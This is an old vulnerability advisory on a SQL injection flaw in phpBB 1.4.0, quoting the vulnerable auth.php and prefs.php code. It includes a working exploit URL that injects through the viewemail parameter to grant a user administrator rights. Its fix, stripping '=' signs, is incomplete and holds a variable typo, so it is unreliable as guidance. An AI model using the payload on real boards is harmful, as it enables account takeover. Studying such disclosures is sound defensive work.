COMMAND

    phpBB

SYSTEMS AFFECTED

    phpBB 1.4.0

PROBLEM

    'kill-9'  found  following.   phpBB,  is  an  open source bulletin
    board created by the  phpBB group.  Version  1.4.x of phpBB has  a
    variable  input  validation  problem  that  can  lead  to  limited
    arbitrary sql  querys including  gaining administrative  access to
    the board.

    The  problem  lies  in  the  fact  that  phpBB  1.4.x  includes an
    algorithm in the auth.php file which removes backslashes that  php
    automatically adds to GPC (Get/Post/Cookie) variables.

    Example code from auth.php:

        if(get_magic_quotes_gpc() == 1)
        {
        switch($REQUEST_METHOD){
           case "POST":
              while (list ($key, $val) = each
        ($HTTP_POST_VARS)){
                 if( is_array($val) ){
                    array_walk($val, 'stripslashes_array', '');
                    $$key = $val;}
              else{
                 $$key = stripslashes($val);}
              }
           break;

    Therefore,  certian  php  variables  submitted  through  a URL can
    reach an sql  query with unescaped  quotes, which is  not good for
    security reasons.  In the  prefs.php file such a situation  exists
    where  a  user  can  execute  an  arbitrary  query by supplying an
    certian value for the $viewemail variable.

    Example sql query in prefs.php:

        $sql = "UPDATE users SET
        user_viewemail='$viewemail',
        user_theme='$themes', user_attachsig = '$sig',
        user_desmile = '$smile', user_html = '$dishtml',
        user_bbcode = '$disbbcode', user_lang = '$lang' WHERE (user_id = '$userdata[user_id]')";

    Example URL gives a username "l337h4x0r" level 4  (administrative)
    privileges the board:

        http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23

SOLUTION

    One fix can be found at:

        http://www.game-mods.com/prefs.php.txt

    Please note  there is  a slight  typo in  the file.   The  correct
    lines to add around line 51 in prefs.php are:

        $fviewemail = str_replace('=','',$viewemail);
        $fthemes = str_replace('=','',$themes);
        $fsig = str_replace('=','',$tsig);
        $fsmile = str_replace('=','',$smile);
        $fdishtml = str_replace('=','',$dishtml);
        $fdisbbcode = str_replace('=','',$disbbcode);
        $flang = str_replace('=','',$lang);
        $sql = "UPDATE users SET user_viewemail='$fviewemail',
        user_theme='$fthemes', user_attachsig = '$fsig', user_desmile = '$fsmile',
        user_html = '$fdishtml', user_bbcode = '$fdisbbcode', user_lang = '$flang'
        WHERE (user_id = '$userdata[user_id]')";

    There may be  other bugs in  the code in  other files that  can be
    exploited in a  similar fashion, but  this resolves one  immediate
    threat.   Another  user  named   mmj  on  the  boards   mentioned:
    "Removing the = signs in all the variables is one solution.  Using
    addslashes() on all the variables in an alternative solutions."